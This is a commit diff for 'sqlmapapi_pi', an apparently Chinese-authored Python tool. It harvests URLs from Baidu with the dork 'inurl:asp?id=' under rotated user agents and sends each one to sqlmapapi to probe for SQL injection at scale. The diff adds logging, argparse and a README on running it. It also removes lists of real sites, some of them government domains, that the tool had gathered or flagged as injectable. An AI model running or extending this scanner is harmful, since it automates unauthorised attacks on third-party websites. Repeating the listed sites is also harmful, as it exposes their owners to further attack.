Compare commits

...

10 Commits

Author SHA1 Message Date
wps2015
57d47e8a00 Update README.md 2022-03-23 16:17:15 +08:00
wps2015
ef2da26e23 add directory
ee
2016-08-27 17:43:33 +08:00
wps2015
e4b03bf86d Merge pull request #2 from yobo000/master
Add logging & argparse by my poor insignificant skill
2016-08-02 15:15:35 +08:00
jingbo-you
4d9755bf5e happy birthday KB 2016-08-02 14:56:15 +08:00
jingbo-you
84a098efbb add ignore 2016-08-02 14:52:46 +08:00
wps2015
8f8ebddb95 readme update 2016-05-17 19:01:50 +08:00
wps2015
a2267acb0c readme update 2016-05-17 18:59:34 +08:00
wps2015
ee4cd19f36 Update and rename README to README.md 2015-12-03 15:54:13 +08:00
sowish
69b595c060 更新说明 2015-12-03 15:41:06 +08:00
sowish
0d74222aaa 更新说明 2015-12-03 15:33:41 +08:00
10 changed files with 127 additions and 76 deletions

4
.gitignore vendored Normal file
View File

@@ -0,0 +1,4 @@
*.pyc
.DS_Store
*.log
data/*.*

View File

@@ -1,20 +1,22 @@
#!/usr/bin/python
#-*-coding:utf-8-*-
from __future__ import absolute_import, print_function
import requests
import time
import json
import threading
import Queue
from search.baidu import *
from search import baidu
import logging
from config import LOG, API_URL
class AutoSqli(object):
"""
使用sqlmapapi的方法进行与sqlmapapi建立的server进行交互
"""
def __init__(self, server='', target='',data = '',referer = '',cookie = ''):
super(AutoSqli, self).__init__()
self.server = server
@@ -28,14 +30,19 @@ class AutoSqli(object):
self.referer = referer
self.cookie = cookie
self.start_time = time.time()
self.logger = logging.getLogger('app.run')
self.logger.info('Creating an instance of AutoSqli for {0}.'.format(self.target))
def task_new(self):
try:
self.taskid = json.loads(
requests.get(self.server + 'task/new').text)['taskid']
#print 'Created new task: ' + self.taskid
if len(self.taskid) > 0:
return True
return False
except ConnectionError:
self.logging.error("sqlmapapi.py is not running")
def task_delete(self):
json_kill = requests.get(self.server + 'task/' + self.taskid + '/delete').text
@@ -46,7 +53,7 @@ class AutoSqli(object):
def scan_start(self):
headers = {'Content-Type': 'application/json'}
print "starting to scan "+ self.target +".................."
self.logger.debug("Starting to scan "+ self.target +"..................")
payload = {'url': self.target}
url = self.server + 'scan/' + self.taskid + '/start'
t = json.loads(
@@ -76,7 +83,8 @@ class AutoSqli(object):
else:
f = open('data/injection.txt','a')
f.write(self.target+'\n')
print 'injection \t'
f.close()
self.logger.warning('injection \t')
def option_set(self):
headers = {'Content-Type': 'application/json'}
@@ -134,28 +142,46 @@ class myThread(threading.Thread):
objects=self.q.get()
result=objects.run()
if __name__ == '__main__':
def main():
import argparse
parser = argparse.ArgumentParser()
parser.add_argument('-n', '--num', default=4, nargs='?', type=int, dest='num', help="Thread num")
parser.add_argument('-p', '--page', default=3, nargs='?', type=int, dest='page', help="Search Page num")
parser.add_argument('-d', '--log', default=LOG["filename"], nargs='?', type=str, dest='log', help="The path of debug log")
args = parser.parse_args()
logger = logging.getLogger('app')
logger.setLevel(LOG["level"])
fh = logging.FileHandler(args.log)
fh.setLevel(LOG["level"])
formatter = logging.Formatter(LOG['format'], LOG["datefmt"])
fh.setFormatter(formatter)
sh = logging.StreamHandler()
sh.setLevel(LOG["level"])
sh.setFormatter(formatter)
logger.addHandler(fh)
logger.addHandler(sh)
urls = []
print 'the program starts!'
logger.info('the program starts!')
pages = args.page
key = 'inurl:asp?id='
pages=3
urls=geturl(key,pages)
urls = baidu.geturl(key, pages)
#print urls
workQueue = Queue.Queue()
for tar in urls:
s = AutoSqli('http://127.0.0.1:8775', tar)
s = AutoSqli(API_URL, tar)
workQueue.put(s)
threads = []
nloops = range(4) #threads Num
nloops = range(args.num) #threads Num
for i in nloops:
t = myThread(workQueue, i)
t.start()
threads.append(t)
for i in nloops:
threads[i].join()
print "Exiting Main Thread"
logger.info("Exiting Main Thread")
if __name__ == '__main__':
main()

0
README
View File

17
README.md Normal file
View File

@@ -0,0 +1,17 @@
## sqlmapapi_pi 批量注入工具
------------
**Intorduction:**
- 本程序是基于[manning23](https://github.com/manning23)的项目二次开发,参考地址 [click me](http://drops.wooyun.org/tips/6653)
- 本程序利用百度爬取特定的url链接然后调用sqlmapapisqlmap自带的批量接口进行注入的判断。
- AutoSqli.py中option的设置可参考set_option.txt可自定义判断注入的方法例如基于时间/布尔等。
**Useage:**
- 在sqlmap的目录下执行`python sqlmapapi.py -s`进行监听操作。
- 运行AutoSqli.py `python AutoSqli.py` 参数可通过`-h`查看
**Tips:**
* 这里要注意的是在代码里自定义搜索关键字:`key='inurl:asp?id='`
* 以及线程数:`nloops = range(4) #threads Num`
* 建议线程数不要太多,以免卡死。
* 请勿利用工具做违法犯罪的事情。

18
config.py Normal file
View File

@@ -0,0 +1,18 @@
#!/bin/env python
# -*- coding=utf-8 -*-
import logging
API_URL = "http://127.0.0.1:8775"
LEVELS = {'debug': logging.DEBUG,
'info': logging.INFO,
'warning': logging.WARNING,
'error': logging.ERROR,
'critical': logging.CRITICAL}
LOG = {
"level" : LEVELS["debug"],
"filename" : "autosqli.log",
"format" : '[%(asctime)s] %(levelname)-8s %(name)-12s %(message)s',
"datefmt" : '%Y-%m-%d %H:%M:%S'
}

7
data/injection.txt Executable file → Normal file
View File

@@ -1,6 +1 @@
http://www.lamarche.com.tw/production_detail.php?shop_category=64&sn=248
http://www.70jj.com/shop/index.php?shop_id=1
http://www.cosmax.com.hk/products_detail.php?product_id=17
http://www.etron.com/en/products/u3hc_detial.php?Product_ID=5
http://www.fembooks.com.tw/indexstore.php?product_id=5423
http://www.guangzhouflower.net.cn/product.php?pid=12
http://www.example.com

View File

@@ -1,20 +0,0 @@
http://www.99166.com/zjinfo.asp?id=5
http://www.yh8z.com/Secondary/guding.asp?Id=68&Parent_ID=18&Type_Class=news&GS_Class=22
http://www.gdkszx.com.cn/ksxx/kszc_show.asp?id=2205
http://www.smxs.gov.cn/viewtexti.asp?id=275079&npage=6
http://www.juancheng.gov.cn/wsbs-view.asp?id=9285
http://rc.sz.zj.cn/company.asp?id=4291
http://www.law-lib.com/fxj/fxj.asp?id=940
http://www.kfws.gov.cn/Article_read.asp?id=2289
http://www.zjghtcm.com/new_show.asp?id=1178
http://www.medsci.cn/sci/journal.asp?id=0bc61099
http://www.dylaw.gov.cn/zhongc/web60/classshow.asp?id=51848&classid=15
http://club.kdnet.net/dispbbs.asp?id=11095423&boardid=1
http://people.rednet.cn/PeopleShow.asp?ID=2410432
http://www.dhzsxx.com/ShowNews.asp?id=1591
http://www.chinawutong.com/co/huoyuan_01/index.asp?id=213633
http://news.chinaxinge.com/shownews.asp?id=53866&sjm=49600b363e048e05
http://www.gxxgty.com/news_show.asp?id=1583
http://szb.keq0475.com/Qnews.asp?ID=49506
http://www.cyfy.cn/kssz.asp?id=42
http://www.szkweekly.com/List.asp?ID=54284

Binary file not shown.

View File

@@ -1,11 +1,16 @@
#coding: utf-8
from __future__ import unicode_literals
import urllib2
import string
import urllib
import re
import random
import logging
user_agents = ['Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20130406 Firefox/23.0', \
__all__ = ["geturl"]
USER_AGENTS = ['Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20130406 Firefox/23.0', \
'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0', \
'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/533+ \
(KHTML, like Gecko) Element Browser 5.0', \
@@ -18,11 +23,14 @@ user_agents = ['Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20130406 Fire
Chrome/28.0.1468.0 Safari/537.36', \
'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0; TheWorld)']
logger = logging.getLogger('app.baidu')
def baidu_search(keyword, pn):
p = {'wd': keyword}
res = urllib2.urlopen(("http://www.baidu.com/s?"+urllib.urlencode(p)+"&pn={0}&cl=3&rn=10").format(pn)) #rn为每页的显示数目 pn表示当前显示的是第pn条搜索结果
html = res.read()
return html
def getList(regex, text): #将获取的url去重并存入list
arr = []
res = re.findall(regex, text)
@@ -30,11 +38,13 @@ def getList(regex,text): #将获取的url去重并存入list
for r in res:
arr.append(r)
return arr
def getMatch(regex, text): #匹配函数
res = re.findall(regex, text)
if res:
return res[0]
return ''
def is_get(url): #是否是sqlmap可识别的get型链接
regex = r'(\S*?)\?.*=.*'
res = re.match(regex,url)
@@ -64,8 +74,8 @@ def geturl(keyword,pages): #获取url
url = link[1] #获取百度改写url
try:
domain = urllib2.Request(url)
r=random.randint(0,11)
domain.add_header('User-agent', user_agents[r])
r = random.randint(0, len(USER_AGENTS))
domain.add_header('User-agent', USER_AGENTS[r])
domain.add_header('connection', 'keep-alive')
response = urllib2.urlopen(domain)
uri = response.geturl() #获取真实url
@@ -80,9 +90,10 @@ def geturl(keyword,pages): #获取url
f1.close()
except:
continue
print "urls have been grabed already!!!"
logger.info("urls have been grabed already!!!")
return targets
if __name__ == '__main__':
pass

Binary file not shown.